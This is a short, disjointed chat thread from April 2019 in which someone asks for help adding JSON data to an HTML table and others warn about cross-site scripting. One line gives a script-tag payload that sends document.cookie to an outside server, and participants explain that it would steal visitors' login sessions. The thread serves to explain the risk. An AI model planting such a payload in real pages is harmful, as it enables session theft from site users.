April 2019

— Not like such


What if someone set it to:
<script>fetch('' + document.cookie)</script>

— Do you see the problem with this?

— What will it do?

— Will send the cookies from every user that logs onto the site to the attacker's server

— And the attacker will potentially have their login session

— That's scary

— I get JSON data in which the data are signatured. I have to extract the data from the JSON object and append it as rows dynamically into a table

— What about this:

— Please help, anybody

— Every user that visits the site will now get redirected to the site's API

— And potentially execute some operation (while logged in as them)